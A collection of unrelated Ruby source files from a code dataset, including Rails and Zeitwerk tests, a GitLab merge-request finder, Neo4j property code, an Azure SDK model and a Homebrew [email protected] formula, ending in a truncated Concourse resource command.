it 'invalidates the cache for the vet360-contact-info-response Redis key' do
VCR.use_cassette('vet360/contact_information/put_email_success') do
expect_any_instance_of(Common::RedisStore).to receive(:destroy)
put(
'/v0/profile/email_addresses',
{ id: 42, email_address: '[email protected]' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
end
end
end
context 'with a validation issue' do
it 'should match the errors schema', :aggregate_failures do
put(
'/v0/profile/email_addresses',
{ email_address: '' }.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:unprocessable_entity)
expect(response).to match_response_schema('errors')
expect(errors_for(response)).to include "email-address - can't be blank"
end
end
context 'when effective_end_date is included' do
let(:email) do
build(:email, vet360_id: '1', email_address: '[email protected]')
end
let(:id_in_cassette) { 42 }
before do
allow_any_instance_of(User).to receive(:icn).and_return('1234')
email.id = id_in_cassette
end
it 'effective_end_date is NOT included in the request body', :aggregate_failures do
VCR.use_cassette('vet360/contact_information/put_email_ignore_eed', VCR::MATCH_EVERYTHING) do
# The cassette we're using includes the effectiveEndDate in the body.
# So this test will not pass if it's missing
put(
'/v0/profile/email_addresses',
email.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:ok)
expect(response).to match_response_schema('vet360/transaction_response')
end
end
end
end
describe 'DELETE /v0/profile/email_addresses' do
let(:email) do
build(:email, vet360_id: user.vet360_id, email_address: '[email protected]')
end
let(:id_in_cassette) { 42 }
before do
allow_any_instance_of(User).to receive(:icn).and_return('64762895576664260')
email.id = id_in_cassette
end
context 'when the method is DELETE' do
it 'effective_end_date gets appended to the request body', :aggregate_failures do
VCR.use_cassette('vet360/contact_information/delete_email_success', VCR::MATCH_EVERYTHING) do
# The cassette we're using includes the effectiveEndDate in the body.
# So this test will not pass if it's missing
delete(
'/v0/profile/email_addresses',
email.to_json,
auth_header.update(
'Content-Type' => 'application/json', 'Accept' => 'application/json'
)
)
expect(response).to have_http_status(:ok)
expect(response).to match_response_schema('vet360/transaction_response')
end
end
end
end
end
| 35.190661 | 101 | 0.611345 |
d5c9bc2193c95d4d35bfb6e62477ed668d1f596c | 1,465 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Hdinsight::Mgmt::V2018_06_01_preview
module Models
#
# The information of AAD security group.
#
class ClientGroupInfo
include MsRestAzure
# @return [String] The AAD security group name.
attr_accessor :group_name
# @return [String] The AAD security group id.
attr_accessor :group_id
#
# Mapper for ClientGroupInfo class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ClientGroupInfo',
type: {
name: 'Composite',
class_name: 'ClientGroupInfo',
model_properties: {
group_name: {
client_side_validation: true,
required: false,
serialized_name: 'groupName',
type: {
name: 'String'
}
},
group_id: {
client_side_validation: true,
required: false,
serialized_name: 'groupId',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 25.258621 | 70 | 0.524232 |
ff8c06b479aeaf48c619de6bf8c5e5ba77b48e82 | 9,758 | # frozen_string_literal: true
require "isolation/abstract_unit"
require "active_support/dependencies/zeitwerk_integration"
class ZeitwerkIntegrationTest < ActiveSupport::TestCase
include ActiveSupport::Testing::Isolation
def setup
build_app
end
def boot(env = "development")
app(env)
end
def teardown
teardown_app
end
def deps
ActiveSupport::Dependencies
end
def decorated?
deps.singleton_class < deps::ZeitwerkIntegration::Decorations
end
test "ActiveSupport::Dependencies is decorated by default" do
boot
assert decorated?
assert Rails.autoloaders.zeitwerk_enabled?
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.main
assert_instance_of Zeitwerk::Loader, Rails.autoloaders.once
assert_equal [Rails.autoloaders.main, Rails.autoloaders.once], Rails.autoloaders.to_a
end
test "ActiveSupport::Dependencies is not decorated in classic mode" do
add_to_config "config.autoloader = :classic"
boot
assert_not decorated?
assert_not Rails.autoloaders.zeitwerk_enabled?
assert_nil Rails.autoloaders.main
assert_nil Rails.autoloaders.once
assert_equal 0, Rails.autoloaders.count
end
test "autoloaders inflect with Active Support" do
app_file "config/initializers/inflections.rb", <<-RUBY
ActiveSupport::Inflector.inflections(:en) do |inflect|
inflect.acronym 'RESTful'
end
RUBY
app_file "app/controllers/restful_controller.rb", <<-RUBY
class RESTfulController < ApplicationController
end
RUBY
boot
basename = "restful_controller"
abspath = "#{Rails.root}/app/controllers/#{basename}.rb"
camelized = "RESTfulController"
Rails.autoloaders.each do |autoloader|
assert_equal camelized, autoloader.inflector.camelize(basename, abspath)
end
assert RESTfulController
end
test "constantize returns the value stored in the constant" do
app_file "app/models/admin/user.rb", "class Admin::User; end"
boot
assert_same Admin::User, deps.constantize("Admin::User")
end
test "constantize raises if the constant is unknown" do
boot
assert_raises(NameError) { deps.constantize("Admin") }
end
test "safe_constantize returns the value stored in the constant" do
app_file "app/models/admin/user.rb", "class Admin::User; end"
boot
assert_same Admin::User, deps.safe_constantize("Admin::User")
end
test "safe_constantize returns nil for unknown constants" do
boot
assert_nil deps.safe_constantize("Admin")
end
test "autoloaded? and overridden class names" do
invalid_constant_name = Module.new do
def self.name
"primary::SchemaMigration"
end
end
assert_not deps.autoloaded?(invalid_constant_name)
end
test "unloadable constants (main)" do
app_file "app/models/user.rb", "class User; end"
app_file "app/models/post.rb", "class Post; end"
boot
assert Post
assert deps.autoloaded?("Post")
assert deps.autoloaded?(Post)
assert_not deps.autoloaded?("User")
assert_equal ["Post"], deps.autoloaded_constants
end
test "unloadable constants (once)" do
add_to_config 'config.autoload_once_paths << "#{Rails.root}/extras"'
app_file "extras/foo.rb", "class Foo; end"
app_file "extras/bar.rb", "class Bar; end"
boot
assert Foo
assert_not deps.autoloaded?("Foo")
assert_not deps.autoloaded?(Foo)
assert_not deps.autoloaded?("Bar")
assert_empty deps.autoloaded_constants
end
test "unloadable constants (reloading disabled)" do
app_file "app/models/user.rb", "class User; end"
app_file "app/models/post.rb", "class Post; end"
boot("production")
assert Post
assert_not deps.autoloaded?("Post")
assert_not deps.autoloaded?(Post)
assert_not deps.autoloaded?("User")
assert_empty deps.autoloaded_constants
end
test "eager loading loads the application code" do
$zeitwerk_integration_test_user = false
$zeitwerk_integration_test_post = false
app_file "app/models/user.rb", "class User; end; $zeitwerk_integration_test_user = true"
app_file "app/models/post.rb", "class Post; end; $zeitwerk_integration_test_post = true"
boot("production")
assert $zeitwerk_integration_test_user
assert $zeitwerk_integration_test_post
end
test "reloading is enabled if config.cache_classes is false" do
boot
assert Rails.autoloaders.main.reloading_enabled?
assert_not Rails.autoloaders.once.reloading_enabled?
end
test "reloading is disabled if config.cache_classes is true" do
boot("production")
assert_not Rails.autoloaders.main.reloading_enabled?
assert_not Rails.autoloaders.once.reloading_enabled?
end
test "reloading raises if config.cache_classes is true" do
boot("production")
e = assert_raises(StandardError) do
deps.clear
end
assert_equal "reloading is disabled because config.cache_classes is true", e.message
end
test "eager loading loads code in engines" do
$test_blog_engine_eager_loaded = false
engine("blog") do |bukkit|
bukkit.write("lib/blog.rb", "class BlogEngine < Rails::Engine; end")
bukkit.write("app/models/post.rb", "Post = $test_blog_engine_eager_loaded = true")
end
boot("production")
assert $test_blog_engine_eager_loaded
end
test "eager loading loads anything managed by Zeitwerk" do
$zeitwerk_integration_test_user = false
app_file "app/models/user.rb", "class User; end; $zeitwerk_integration_test_user = true"
$zeitwerk_integration_test_extras = false
app_dir "extras"
app_file "extras/webhook_hacks.rb", "WebhookHacks = 1; $zeitwerk_integration_test_extras = true"
require "zeitwerk"
autoloader = Zeitwerk::Loader.new
autoloader.push_dir("#{app_path}/extras")
autoloader.setup
boot("production")
assert $zeitwerk_integration_test_user
assert $zeitwerk_integration_test_extras
end
test "autoload directories not present in eager load paths are not eager loaded" do
$zeitwerk_integration_test_user = false
app_file "app/models/user.rb", "class User; end; $zeitwerk_integration_test_user = true"
$zeitwerk_integration_test_lib = false
app_dir "lib"
app_file "lib/webhook_hacks.rb", "WebhookHacks = 1; $zeitwerk_integration_test_lib = true"
$zeitwerk_integration_test_extras = false
app_dir "extras"
app_file "extras/websocket_hacks.rb", "WebsocketHacks = 1; $zeitwerk_integration_test_extras = true"
add_to_config "config.autoload_paths << '#{app_path}/lib'"
add_to_config "config.autoload_once_paths << '#{app_path}/extras'"
boot("production")
assert $zeitwerk_integration_test_user
assert_not $zeitwerk_integration_test_lib
assert_not $zeitwerk_integration_test_extras
assert WebhookHacks
assert WebsocketHacks
assert $zeitwerk_integration_test_lib
assert $zeitwerk_integration_test_extras
end
test "autoload_paths are set as root dirs of main, and in the same order" do
boot
existing_autoload_paths = deps.autoload_paths.select { |dir| File.directory?(dir) }
assert_equal existing_autoload_paths, Rails.autoloaders.main.dirs
end
test "autoload_once_paths go to the once autoloader, and in the same order" do
extras = %w(e1 e2 e3)
extras.each do |extra|
app_dir extra
add_to_config %(config.autoload_once_paths << "\#{Rails.root}/#{extra}")
end
boot
extras = extras.map { |extra| "#{app_path}/#{extra}" }
extras.each do |extra|
assert_not_includes Rails.autoloaders.main.dirs, extra
end
assert_equal extras, Rails.autoloaders.once.dirs
end
test "clear reloads the main autoloader, and does not reload the once one" do
boot
$zeitwerk_integration_reload_test = []
main_autoloader = Rails.autoloaders.main
def main_autoloader.reload
$zeitwerk_integration_reload_test << :main_autoloader
super
end
once_autoloader = Rails.autoloaders.once
def once_autoloader.reload
$zeitwerk_integration_reload_test << :once_autoloader
super
end
ActiveSupport::Dependencies.clear
assert_equal %i(main_autoloader), $zeitwerk_integration_reload_test
end
test "verbose = true sets the dependencies logger if present" do
boot
logger = Logger.new(File::NULL)
ActiveSupport::Dependencies.logger = logger
ActiveSupport::Dependencies.verbose = true
Rails.autoloaders.each do |autoloader|
assert_same logger, autoloader.logger
end
end
test "verbose = true sets the Rails logger as fallback" do
boot
ActiveSupport::Dependencies.verbose = true
Rails.autoloaders.each do |autoloader|
assert_same Rails.logger, autoloader.logger
end
end
test "verbose = false sets loggers to nil" do
boot
ActiveSupport::Dependencies.verbose = true
Rails.autoloaders.each do |autoloader|
assert autoloader.logger
end
ActiveSupport::Dependencies.verbose = false
Rails.autoloaders.each do |autoloader|
assert_nil autoloader.logger
end
end
test "unhooks" do
boot
assert_equal Module, Module.method(:const_missing).owner
assert_equal :no_op, deps.unhook!
end
test "autoloaders.logger=" do
boot
logger = ->(_msg) { }
Rails.autoloaders.logger = logger
Rails.autoloaders.each do |autoloader|
assert_same logger, autoloader.logger
end
Rails.autoloaders.logger = Rails.logger
Rails.autoloaders.each do |autoloader|
assert_same Rails.logger, autoloader.logger
end
Rails.autoloaders.logger = nil
Rails.autoloaders.each do |autoloader|
assert_nil autoloader.logger
end
end
end
| 27.105556 | 104 | 0.723919 |
0334d87655c76710533927d4b2e83155c6dd718e | 628 | # frozen_string_literal: true
class ActiveRecordDoctor::Detectors::UnindexedForeignKeysTest < Minitest::Test
def test_unindexed_foreign_key_is_reported
create_table(:companies)
create_table(:users) do |t|
t.references :company, foreign_key: true, index: false
end
assert_success(<<OUTPUT)
The following foreign keys should be indexed for performance reasons:
users company_id
OUTPUT
end
def test_indexed_foreign_key_is_not_reported
create_table(:companies)
create_table(:users) do |t|
t.references :company, foreign_key: true, index: true
end
assert_success("")
end
end
| 25.12 | 78 | 0.753185 |
bf13ca4a74d8380e78bb6bbee47454f5f4f25adc | 8,677 | module Neo4j::Shared
module Property
extend ActiveSupport::Concern
include Neo4j::Shared::MassAssignment
include Neo4j::Shared::TypecastedAttributes
include ActiveModel::Dirty
class UndefinedPropertyError < Neo4j::Error; end
class MultiparameterAssignmentError < Neo4j::Error; end
attr_reader :_persisted_obj
def inspect
attribute_descriptions = inspect_attributes.map do |key, value|
"#{Neo4j::ANSI::CYAN}#{key}: #{Neo4j::ANSI::CLEAR}#{value.inspect}"
end.join(', ')
separator = ' ' unless attribute_descriptions.empty?
"#<#{Neo4j::ANSI::YELLOW}#{self.class.name}#{Neo4j::ANSI::CLEAR}#{separator}#{attribute_descriptions}>"
end
def initialize(attributes = nil)
attributes = process_attributes(attributes)
modded_attributes = inject_defaults!(attributes)
validate_attributes!(modded_attributes)
writer_method_props = extract_writer_methods!(modded_attributes)
send_props(writer_method_props)
self.undeclared_properties = attributes
@_persisted_obj = nil
end
def undeclared_properties=(_); end
def inject_defaults!(starting_props)
return starting_props if self.class.declared_properties.declared_property_defaults.empty?
self.class.declared_properties.inject_defaults!(self, starting_props || {})
end
def read_attribute(name)
respond_to?(name) ? send(name) : nil
end
alias [] read_attribute
def send_props(hash)
return hash if hash.blank?
hash.each { |key, value| send("#{key}=", value) }
end
def reload_properties!(properties)
@attributes = nil
convert_and_assign_attributes(properties)
end
private
# Changes attributes hash to remove relationship keys
# Raises an error if there are any keys left which haven't been defined as properties on the model
# TODO: use declared_properties instead of self.attributes
def validate_attributes!(attributes)
return attributes if attributes.blank?
invalid_properties = attributes.keys.map(&:to_s) - self.attributes.keys
invalid_properties.reject! { |name| self.respond_to?("#{name}=") }
fail UndefinedPropertyError, "Undefined properties: #{invalid_properties.join(',')}" if !invalid_properties.empty?
end
def extract_writer_methods!(attributes)
return attributes if attributes.blank?
{}.tap do |writer_method_props|
attributes.each_key do |key|
writer_method_props[key] = attributes.delete(key) if self.respond_to?("#{key}=")
end
end
end
DATE_KEY_REGEX = /\A([^\(]+)\((\d+)([if])\)$/
# Gives support for Rails date_select, datetime_select, time_select helpers.
def process_attributes(attributes = nil)
return attributes if attributes.blank?
multi_parameter_attributes = {}
new_attributes = {}
attributes.each_pair do |key, value|
if key.match(DATE_KEY_REGEX)
match = key.to_s.match(DATE_KEY_REGEX)
found_key = match[1]
index = match[2].to_i
(multi_parameter_attributes[found_key] ||= {})[index] = value.empty? ? nil : value.send("to_#{$3}")
else
new_attributes[key] = value
end
end
multi_parameter_attributes.empty? ? new_attributes : process_multiparameter_attributes(multi_parameter_attributes, new_attributes)
end
def process_multiparameter_attributes(multi_parameter_attributes, new_attributes)
multi_parameter_attributes.each_with_object(new_attributes) do |(key, values), attributes|
values = (values.keys.min..values.keys.max).map { |i| values[i] }
if (field = self.class.attributes[key.to_sym]).nil?
fail MultiparameterAssignmentError, "error on assignment #{values.inspect} to #{key}"
end
attributes[key] = instantiate_object(field, values)
end
end
def instantiate_object(field, values_with_empty_parameters)
return nil if values_with_empty_parameters.all?(&:nil?)
values = values_with_empty_parameters.collect { |v| v.nil? ? 1 : v }
klass = field.type
klass ? klass.new(*values) : values
end
module ClassMethods
extend Forwardable
def_delegators :declared_properties, :serialized_properties, :serialized_properties=, :serialize, :declared_property_defaults
VALID_PROPERTY_OPTIONS = %w(type default index constraint serializer typecaster).map(&:to_sym)
# Defines a property on the class
#
# See active_attr gem for allowed options, e.g which type
# Notice, in Neo4j you don't have to declare properties before using them, see the neo4j-core api.
#
# @example Without type
# class Person
# # declare a property which can have any value
# property :name
# end
#
# @example With type and a default value
# class Person
# # declare a property which can have any value
# property :score, type: Integer, default: 0
# end
#
# @example With an index
# class Person
# # declare a property which can have any value
# property :name, index: :exact
# end
#
# @example With a constraint
# class Person
# # declare a property which can have any value
# property :name, constraint: :unique
# end
def property(name, options = {})
invalid_option_keys = options.keys.map(&:to_sym) - VALID_PROPERTY_OPTIONS
fail ArgumentError, "Invalid options for property `#{name}` on `#{self.name}`: #{invalid_option_keys.join(', ')}" if invalid_option_keys.any?
build_property(name, options) do |prop|
attribute(prop)
end
end
# @param [Symbol] name The property name
# @param [Neo4j::Shared::AttributeDefinition] attr_def A cloned AttributeDefinition to reuse
# @param [Hash] options An options hash to use in the new property definition
def inherit_property(name, attr_def, options = {})
build_property(name, options) do |prop_name|
attributes[prop_name] = attr_def
end
end
def build_property(name, options)
decl_prop = DeclaredProperty.new(name, options).tap do |prop|
prop.register
declared_properties.register(prop)
yield name
constraint_or_index(name, options)
end
# If this class has already been inherited, make sure subclasses inherit property
subclasses.each do |klass|
klass.inherit_property name, decl_prop.clone, declared_properties[name].options
end
decl_prop
end
def undef_property(name)
undef_constraint_or_index(name)
declared_properties.unregister(name)
attribute_methods(name).each { |method| undef_method(method) }
end
def declared_properties
@_declared_properties ||= DeclaredProperties.new(self)
end
# @return [Hash] A frozen hash of all model properties with nil values. It is used during node loading and prevents
# an extra call to a slow dependency method.
def attributes_nil_hash
declared_properties.attributes_nil_hash
end
def extract_association_attributes!(props)
props
end
private
def attribute!(name)
remove_instance_variable('@attribute_methods_generated') if instance_variable_defined?('@attribute_methods_generated')
define_attribute_methods([name]) unless attribute_names.include?(name)
attributes[name.to_s] = declared_properties[name]
define_method("#{name}=") do |value|
typecast_value = typecast_attribute(_attribute_typecaster(name), value)
send("#{name}_will_change!") unless typecast_value == read_attribute(name)
super(value)
end
end
def constraint_or_index(name, options)
# either constraint or index, do not set both
if options[:constraint]
fail "unknown constraint type #{options[:constraint]}, only :unique supported" if options[:constraint] != :unique
constraint(name, type: :unique)
elsif options[:index]
fail "unknown index type #{options[:index]}, only :exact supported" if options[:index] != :exact
index(name) if options[:index] == :exact
end
end
def undef_constraint_or_index(name)
prop = declared_properties[name]
return unless prop.index_or_constraint?
type = prop.constraint? ? :constraint : :index
send(:"drop_#{type}", name)
end
end
end
end
| 37.081197 | 149 | 0.667051 |
d5e6c4783c1dc3de8f2d6f43681eddbcbfd88813 | 2,879 | # frozen_string_literal: true
# Finders::MergeRequest class
#
# Used to filter MergeRequests collections by set of params
#
# Arguments:
# current_user - which user use
# params:
# scope: 'created_by_me' or 'assigned_to_me' or 'all'
# state: 'open', 'closed', 'merged', 'locked', or 'all'
# group_id: integer
# project_id: integer
# milestone_title: string
# release_tag: string
# author_id: integer
# author_username: string
# assignee_id: integer
# search: string
# in: 'title', 'description', or a string joining them with comma
# label_name: string
# sort: string
# non_archived: boolean
# my_reaction_emoji: string
# source_branch: string
# target_branch: string
# created_after: datetime
# created_before: datetime
# updated_after: datetime
# updated_before: datetime
#
class MergeRequestsFinder < IssuableFinder
def self.scalar_params
@scalar_params ||= super + [:wip, :target_branch]
end
def klass
MergeRequest
end
def filter_items(_items)
items = by_commit(super)
items = by_deployment(items)
items = by_source_branch(items)
items = by_wip(items)
items = by_target_branch(items)
by_source_project_id(items)
end
private
def by_commit(items)
return items unless params[:commit_sha].presence
items.by_commit_sha(params[:commit_sha])
end
def source_branch
@source_branch ||= params[:source_branch].presence
end
# rubocop: disable CodeReuse/ActiveRecord
def by_source_branch(items)
return items unless source_branch
items.where(source_branch: source_branch)
end
# rubocop: enable CodeReuse/ActiveRecord
def target_branch
@target_branch ||= params[:target_branch].presence
end
# rubocop: disable CodeReuse/ActiveRecord
def by_target_branch(items)
return items unless target_branch
items.where(target_branch: target_branch)
end
def source_project_id
@source_project_id ||= params[:source_project_id].presence
end
def by_source_project_id(items)
return items unless source_project_id
items.where(source_project_id: source_project_id)
end
def by_wip(items)
if params[:wip] == 'yes'
items.where(wip_match(items.arel_table))
elsif params[:wip] == 'no'
items.where.not(wip_match(items.arel_table))
else
items
end
end
def wip_match(table)
table[:title].matches('WIP:%')
.or(table[:title].matches('WIP %'))
.or(table[:title].matches('[WIP]%'))
end
def by_deployment(items)
return items unless deployment_id
items.includes(:deployment_merge_requests)
.where(deployment_merge_requests: { deployment_id: deployment_id })
end
def deployment_id
@deployment_id ||= params[:deployment_id].presence
end
end
MergeRequestsFinder.prepend_if_ee('EE::MergeRequestsFinder')
| 23.991667 | 76 | 0.704411 |
b9a5fb274e99c0732aabb9a8f50f76a8b6a8fe3a | 5,769 | class MysqlAT56 < Formula
desc "Open source relational database management system"
homepage "https://dev.mysql.com/doc/refman/5.6/en/"
url "https://dev.mysql.com/get/Downloads/MySQL-5.6/mysql-5.6.51.tar.gz"
sha256 "262ccaf2930fca1f33787505dd125a7a04844f40d3421289a51974b5935d9abc"
license "GPL-2.0-only"
bottle do
rebuild 1
sha256 monterey: "e3132c3b1381b6ea6a2298166866e637560b0be3223912d1512a150b096fa104"
sha256 big_sur: "30a530ddb785efe7542641366126d7b4afcce09bde0fa104b869814fa69fc9e2"
sha256 catalina: "a5309a985dccc02490ff9bd0be1575a4e8908ca3e15dcfaa77e7d2b2bd616cfd"
sha256 mojave: "1ba2347383b539258d1c0a29cbbee722c30e6c28446c22a669a8a7deabd5f53e"
sha256 x86_64_linux: "91b24798f46a2bc7b616fb73fc47a5337acb5b8e0a6f9be1c657eade6fade45b"
end
keg_only :versioned_formula
deprecate! date: "2021-02-01", because: :unsupported
depends_on "cmake" => :build
depends_on "[email protected]"
uses_from_macos "libedit"
def datadir
var/"mysql"
end
# Fixes loading of VERSION file, backported from mysql/mysql-server@51675dd
patch :DATA
def install
# Don't hard-code the libtool path. See:
# https://github.com/Homebrew/homebrew/issues/20185
inreplace "cmake/libutils.cmake",
"COMMAND /usr/bin/libtool -static -o ${TARGET_LOCATION}",
"COMMAND libtool -static -o ${TARGET_LOCATION}"
# Fix loading of VERSION file; required in conjunction with patch
File.rename "VERSION", "MYSQL_VERSION"
# -DINSTALL_* are relative to `CMAKE_INSTALL_PREFIX` (`prefix`)
args = %W[
-DCOMPILATION_COMMENT=Homebrew
-DDEFAULT_CHARSET=utf8
-DDEFAULT_COLLATION=utf8_general_ci
-DINSTALL_DOCDIR=share/doc/#{name}
-DINSTALL_INCLUDEDIR=include/mysql
-DINSTALL_INFODIR=share/info
-DINSTALL_MANDIR=share/man
-DINSTALL_MYSQLSHAREDIR=share/mysql
-DMYSQL_DATADIR=#{datadir}
-DSYSCONFDIR=#{etc}
-DWITH_EDITLINE=system
-DWITH_NUMA=OFF
-DWITH_SSL=yes
-DWITH_UNIT_TESTS=OFF
-DWITH_EMBEDDED_SERVER=ON
-DWITH_ARCHIVE_STORAGE_ENGINE=1
-DWITH_BLACKHOLE_STORAGE_ENGINE=1
-DENABLED_LOCAL_INFILE=1
-DWITH_INNODB_MEMCACHED=ON
]
system "cmake", ".", *std_cmake_args, *args
system "make"
system "make", "install"
# Avoid references to the Homebrew shims directory
inreplace bin/"mysqlbug", "#{Superenv.shims_path}/", ""
(prefix/"mysql-test").cd do
system "./mysql-test-run.pl", "status", "--vardir=#{Dir.mktmpdir}"
end
# Remove the tests directory
rm_rf prefix/"mysql-test"
# Don't create databases inside of the prefix!
# See: https://github.com/Homebrew/homebrew/issues/4975
rm_rf prefix/"data"
# Link the setup script into bin
bin.install_symlink prefix/"scripts/mysql_install_db"
# Fix up the control script and link into bin.
inreplace "#{prefix}/support-files/mysql.server",
/^(PATH=".*)(")/,
"\\1:#{HOMEBREW_PREFIX}/bin\\2"
bin.install_symlink prefix/"support-files/mysql.server"
libexec.install bin/"mysqlaccess"
libexec.install bin/"mysqlaccess.conf"
# Install my.cnf that binds to 127.0.0.1 by default
(buildpath/"my.cnf").write <<~EOS
# Default Homebrew MySQL server config
[mysqld]
# Only allow connections from localhost
bind-address = 127.0.0.1
EOS
etc.install "my.cnf"
end
def post_install
# Make sure the var/mysql directory exists
(var/"mysql").mkpath
# Don't initialize database, it clashes when testing other MySQL-like implementations.
return if ENV["HOMEBREW_GITHUB_ACTIONS"]
unless (datadir/"mysql/general_log.CSM").exist?
ENV["TMPDIR"] = nil
system bin/"mysql_install_db", "--verbose", "--user=#{ENV["USER"]}",
"--basedir=#{prefix}", "--datadir=#{datadir}", "--tmpdir=/tmp"
end
end
def caveats
<<~EOS
A "/etc/my.cnf" from another install may interfere with a Homebrew-built
server starting up correctly.
MySQL is configured to only allow connections from localhost by default
To connect:
mysql -uroot
EOS
end
service do
run [opt_bin/"mysqld_safe", "--datadir=#{var}/mysql"]
keep_alive true
working_dir var/"mysql"
end
test do
(testpath/"mysql").mkpath
(testpath/"tmp").mkpath
system bin/"mysql_install_db", "--no-defaults", "--user=#{ENV["USER"]}",
"--basedir=#{prefix}", "--datadir=#{testpath}/mysql", "--tmpdir=#{testpath}/tmp"
port = free_port
fork do
system "#{bin}/mysqld", "--no-defaults", "--user=#{ENV["USER"]}",
"--datadir=#{testpath}/mysql", "--port=#{port}", "--tmpdir=#{testpath}/tmp"
end
sleep 5
assert_match "information_schema",
shell_output("#{bin}/mysql --port=#{port} --user=root --password= --execute='show databases;'")
system "#{bin}/mysqladmin", "--port=#{port}", "--user=root", "--password=", "shutdown"
end
end
__END__
diff --git a/cmake/mysql_version.cmake b/cmake/mysql_version.cmake
index 34ed6f4..4becbbc 100644
--- a/cmake/mysql_version.cmake
+++ b/cmake/mysql_version.cmake
@@ -31,7 +31,7 @@ SET(DOT_FRM_VERSION "6")
# Generate "something" to trigger cmake rerun when VERSION changes
CONFIGURE_FILE(
- ${CMAKE_SOURCE_DIR}/VERSION
+ ${CMAKE_SOURCE_DIR}/MYSQL_VERSION
${CMAKE_BINARY_DIR}/VERSION.dep
)
@@ -39,7 +39,7 @@ CONFIGURE_FILE(
MACRO(MYSQL_GET_CONFIG_VALUE keyword var)
IF(NOT ${var})
- FILE (STRINGS ${CMAKE_SOURCE_DIR}/VERSION str REGEX "^[ ]*${keyword}=")
+ FILE (STRINGS ${CMAKE_SOURCE_DIR}/MYSQL_VERSION str REGEX "^[ ]*${keyword}=")
IF(str)
STRING(REPLACE "${keyword}=" "" str ${str})
STRING(REGEX REPLACE "[ ].*" "" str "${str}")
| 32.410112 | 101 | 0.678454 |
28d03832c8f94710753a805d6e3dd5304542ce94 | 3,291 | module RailsAdmin
module Models
module Setup
module AlgorithmAdmin
extend ActiveSupport::Concern
included do
rails_admin do
navigation_label 'Compute'
navigation_icon 'fa fa-cog'
weight 400
object_label_method { :custom_title }
extra_associations do
association = ::Mongoid::Relations::Metadata.new(
name: :stored_outputs, relation: ::Mongoid::Relations::Referenced::Many,
inverse_class_name: ::Setup::Algorithm.to_s, class_name: ::Setup::AlgorithmOutput.to_s
)
[RailsAdmin::Adapters::Mongoid::Association.new(association, abstract_model.model)]
end
configure :namespace, :enum_edit
configure :code_warnings, :code_warnings
configure :code, :code do
help { 'Required' }
code_config do
{
mode: case bindings[:object].language
when :php
'text/x-php'
when :javascript
'text/javascript'
when :python
'text/x-python'
else
'text/x-ruby'
end
}
end
end
configure :language do
help 'Required'
end
edit do
field :namespace, :enum_edit, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :name, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :description, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :parameters, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :language, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :code_warnings
field :code
field :call_links do
shared_read_only
visible { bindings[:object].call_links.present? }
end
field :store_output, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :output_datatype, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :validate_output, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
field :tags, &RailsAdmin::Config::Fields::Base::SHARED_READ_ONLY
end
show do
field :namespace
field :name
field :description
field :language
field :parameters
field :code_warnings
field :code
field :call_links
field :tags
field :_id
field :stored_outputs
end
list do
field :namespace
field :name
field :description
field :language
field :tags
field :updated_at
end
fields :namespace, :name, :description, :language, :parameters, :call_links, :tags
filter_query_fields :namespace, :name
end
end
end
end
end
end
| 33.242424 | 102 | 0.512306 |
5d5f1e459b04a6480f34db7bb2c853c3c8f566ad | 883 | Pod::Spec.new do |s|
s.name = "CWPopup"
s.version = "1.2.4"
s.summary = "A category on UIViewController to present a popup view controller."
s.description = "CWPopup adds a category on UIViewController to present a popup view controller. It offers an animated and non-animated presentation of the popup, similarly to presenting a modal controller or pushing a view controller."
s.homepage = "http://github.com/cezarywojcik/CWPopup"
s.screenshots = "https://raw.github.com/cezarywojcik/CWPopup/master/screenshot.png"
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { "Cezary Wojcik" => "[email protected]" }
s.platform = :ios, '4.3'
s.source = { :git => "https://github.com/cezarywojcik/CWPopup.git",
:tag => s.version.to_s }
s.source_files = 'CWPopup'
s.requires_arc = true
end
| 55.1875 | 239 | 0.667044 |
e9a7d6a315240d122b05037588122999330eb063 | 1,763 | # frozen_string_literal: true
module GroupTree
# rubocop:disable Gitlab/ModuleWithInstanceVariables
# rubocop: disable CodeReuse/ActiveRecord
def render_group_tree(groups)
groups = groups.sort_by_attribute(@sort = params[:sort])
groups = if params[:filter].present?
filtered_groups_with_ancestors(groups)
else
# If `params[:parent_id]` is `nil`, we will only show root-groups
groups.where(parent_id: params[:parent_id]).page(params[:page])
end
@groups = groups.with_selects_for_list(archived: params[:archived])
respond_to do |format|
format.html
format.json do
serializer = GroupChildSerializer.new(current_user: current_user)
.with_pagination(request, response)
serializer.expand_hierarchy if params[:filter].present?
render json: serializer.represent(@groups)
end
end
# rubocop:enable Gitlab/ModuleWithInstanceVariables
end
# rubocop: enable CodeReuse/ActiveRecord
# rubocop: disable CodeReuse/ActiveRecord
def filtered_groups_with_ancestors(groups)
filtered_groups = groups.search(params[:filter]).page(params[:page])
if Group.supports_nested_objects?
# We find the ancestors by ID of the search results here.
# Otherwise the ancestors would also have filters applied,
# which would cause them not to be preloaded.
#
# Pagination needs to be applied before loading the ancestors to
# make sure ancestors are not cut off by pagination.
Gitlab::ObjectHierarchy.new(Group.where(id: filtered_groups.select(:id)))
.base_and_ancestors
else
filtered_groups
end
end
# rubocop: enable CodeReuse/ActiveRecord
end
| 35.26 | 80 | 0.695406 |
1c1f709f9d0ccf71989296a69805e4cf6d0516fd | 3,503 | #!/usr/bin/env ruby
# frozen_string_literal: true
require 'English'
require 'json'
require 'shellwords'
require_relative 'base'
module Commands
class In < Commands::Base
attr_reader :destination
def initialize(destination:, input: Input.instance)
@destination = destination
